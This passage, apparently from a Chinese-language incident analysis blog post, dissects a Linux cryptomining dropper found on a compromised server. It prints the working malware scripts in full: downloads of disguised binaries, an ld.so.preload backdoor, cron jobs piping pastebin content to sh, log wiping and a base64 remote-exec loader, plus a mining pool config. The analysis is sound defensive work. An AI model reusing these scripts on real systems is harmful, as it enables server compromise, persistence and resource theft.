rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l )
if [ ${y} -eq 0 ];then
    netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}

function system() {
    if [ ! -f "/bin/httpdns" ]; then
        curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
        if [ ! -f "/bin/httpdns" ]; then
            wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
        fi
        sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab
    fi

}

function top() {
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
        curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
            wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
        echo /usr/local/lib/libntp.so > /etc/ld.so.preload
    else
        sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
    fi
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libjdk.so
    touch -acmr /bin/sh /usr/local/lib/libntp.so
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
}

function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmpa
}

function echocron() {
    echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
    echo -e "*/30 * * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "* */10 * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /var/spool/cron/crontabs
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
}

function downloadrun() {
    ps=$(netstat -anp | grep 13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep 13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
    rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
    echocron
else
    if [ ! -f "/tmp/.tmpa" ]; then
        rm -rf /tmp/.tmp
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep 13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
fi
#
#

  这个shell就比较复杂了,一个一个来分析吧,从上到下看看他封装的shell方法吧

  • kills
      找到一堆进程并杀掉
  • system
      把的https://pastebin.com/raw/698D7kZU内容/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash保存到 /bin/httpdns 文件并给他赋权限
    https://pastebin.com/raw/kDSLjxfQ 又是一个base64 `
IyEvYmluL3NoClNIRUxMPS9iaW4vc2gKUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3NiaW46L2JpbjovdXNyL3NiaW46L3Vzci9iaW4KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1vIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1PIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWZpCgkJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWVsc2UKCQkJbm9odXAgL3RtcC9rd29ya2VyZHMgPi9kZXYvbnVsbCAyPiYxICYKCQlmaQoJZmkKfQoKZnVuY3Rpb24gZG93bmxvYWRydW54bSgpIHsKCXBtPSQobmV0c3RhdCAtYW5wIHwgZ3JlcCAxMzUzMSB8IHdjIC1sKQoJaWYgWyAke3BtfSAtZXEgMCBdO3RoZW4KCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1vIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1PIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlmaQoJCWZpCgkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBpbml0KCkgewoJaWYgWyAhIC1mICIvdXNyL3NiaW4va3dvcmtlciIgXTsgdGhlbgoJCWN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2Mi8xNTM1MTc1MDE1eC0xNDA0ODE3ODgwLmpwZyAtbyAvdXNyL3NiaW4va3dvcmtlciAmJiBjaG1vZCA3NzcgL3Vzci9zYmluL2t3b3JrZXIKCQlpZiBbICEgLWYgIi91c3Ivc2Jpbi9rd29ya2VyIiBdOyB0aGVuCgkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUwMTV4LTE0MDQ4MTc4ODAuanBnIC1PIC91c3Ivc2Jpbi9rd29ya2VyICYmIGNobW9kIDc3NyAvdXNyL3NiaW4va3dvcmtlcgoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2luaXQuZC9rd29ya2VyIiBdOyB0aGVuCgkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUzNDN4LTE1NjY2NTc2NzUuanBnIC1vIC9ldGMvaW5pdC5kL2t3b3JrZXIgJiYgY2htb2QgNzc3IC9ldGMvaW5pdC5kL2t3b3JrZXIKCQlpZiBbICEgLWYgIi9ldGMvaW5pdC5kL2t3b3JrZXIiIF07IHRoZW4KCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjIvMTUzNTE3NTM0M3gtMTU2NjY1NzY3NS5qcGcgLU8gL2V0Yy9pbml0LmQva3dvcmtlciAmJiBjaG1vZCA3NzcgL2V0Yy9pbml0LmQva3dvcmtlcgoJCWZpCglmaQoJY2hrY29uZmlnIC0tYWRkIGt3b3JrZXIKfQoKZnVuY3Rpb24gZWNob2Nyb24oKSB7CgllY2hvIC1lICIqLzEwICogKiAqICogcm9vdCAvdXNyL2Jpbi9jdXJsIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWRvd25sb2FkcnVuCglpbml0CgllY2hvY3JvbgoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
``` &emsp;&emsp;解码之后是 




<div class="se-preview-section-delimiter"></div>

```shell
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
    ps=$(netstat -anp | grep 13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep 13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function init() {
    if [ ! -f "/usr/sbin/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        if [ ! -f "/usr/sbin/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        fi
    fi
    if [ ! -f "/etc/init.d/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        if [ ! -f "/etc/init.d/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        fi
    fi
    chkconfig --add kworker
}

function echocron() {
    echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
    echo -e "*/30 * * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "* */10 * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
    rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
    echocron
else
    downloadrun
    init
    echocron
    sleep 10
    port=$(netstat -anp | grep 13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
fi
#
#

这个等会再分析

  • top
      把这个http://thyrsi.com/t6/365/1535595427x-1404817712.jpg图片保存到服务器的/usr/local/lib/libntp.so(同事保存到/etc/ld.so.preload)并赋权限,这个看似一个图片其实应该是个动态链接库具体有什么作用还不太清楚,但是凭感觉没有干什么好事,然后把他刚创建的这几个文件 /etc/ld.so.preload``/usr/local/lib/libjdk.so``/usr/local/lib/libntp.so的修改时间变得和/bin/sh一样(真是大大的坏)
  • python
      
    后台运行python程序 python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))"这个就是最开始查到的python进程(原来是在这被启动的)
  • echocron
      
    把类似这样的定时任务写到了三个crontabs的配置文件里面"*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##"分别是 /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root, 同样把他们的修改时间变得和/bin/sh一样
  • downloadrun
      
    http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限 然后后台执行 /tmp/kworkerds 这个应该是个可执行文件 但是不是一个shell,但是干掉一个也不是什么好事
  • downloadrunxm
      
    http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json 
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

  没有看到哪里使用了,但是应该是和之前的动态链接库和可执行文件有关,同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds

  • 分析这个shell脚本
      脚本封装的一些方法基本分析完了,看看这个脚本干了什么事情:先kills杀掉一堆进程,然后downloadrun下载一个可执行文件并后台运行,再echocron写了一堆定时任务,再system下载了动态链接库,然后top下载一个动态链接库并同步到/etc/ld.so.preload植入了预加载型恶意动态链接库后门,休息10sdownloadrunxm下载config.json,下载可执行文件/bin/kworkerds并后台运行

  • 这个shell分析完了再看看system方法里面出现的那个shell

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function downloadrun() {
    ps=$(netstat -anp | grep 13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep 13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function init() {
    if [ ! -f "/usr/sbin/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        if [ ! -f "/usr/sbin/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
        fi
    fi
    if [ ! -f "/etc/init.d/kworker" ]; then
        curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        if [ ! -f "/etc/init.d/kworker" ]; then
            wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
        fi
    fi
    chkconfig --add kworker
}

function echocron() {
    echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
    echo -e "*/30 * * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "* */10 * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
    rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
    echocron
else
    downloadrun
    init
    echocron
    sleep 10
    port=$(netstat -anp | grep 13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
fi
#
#

  这个shell和之前那个shell很相似很多方法重复了,但是也有一些变化,同样先看看他的方法

downloadrun

  http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限然后后台执行 /tmp/kworkerds

downloadrunxm

  把http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json 同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds

echocron

  到处写定时任务

init

  这个方法之前没有,把http://thyrsi.com/t6/362/1535175015x-1404817880.jpg的内容保存到/usr/sbin/kworker并赋权限,这也是一个可执行文件,把http://thyrsi.com/t6/362/1535175343x-1566657675.jpg的内容保存到/etc/init.d/kworker并赋权限,这也是一个shell脚本是kworker的脚本chkconfig --add kworker添加开机自启

#! /bin/bash
#chkconfig: - 99 01
#description: kworker daemon
#processname: /usr/sbin/kworker
### BEGIN INIT INFO
# Provides: /user/sbin/kworker
# Required-Start:
# Required-Stop:
# Default-Start:    2 3 4 5
# Default-Stop:     0 1 6
# Short-Description: kworker deamon
# Description:      kworker deamon
### END INIT INFO

LocalPath="/usr/sbin/kworker"
name='kworker'
pid_file="/var/run/$name.pid"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see$stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping$name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; maystill be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file"]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will notattempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac
exit 0

  方法分析完了分析一下这个shell:就是downloadrun下载可执行文件/tmp/kworkerds并后台运行然后init下载并配置kworkerd开机自启之后echocron在三个地方配置定时任务sleep 10休息10sdownloadrunxm下载/bin/config.json并下载可执行文件/tmp/kworkerds后台运行

4.感想

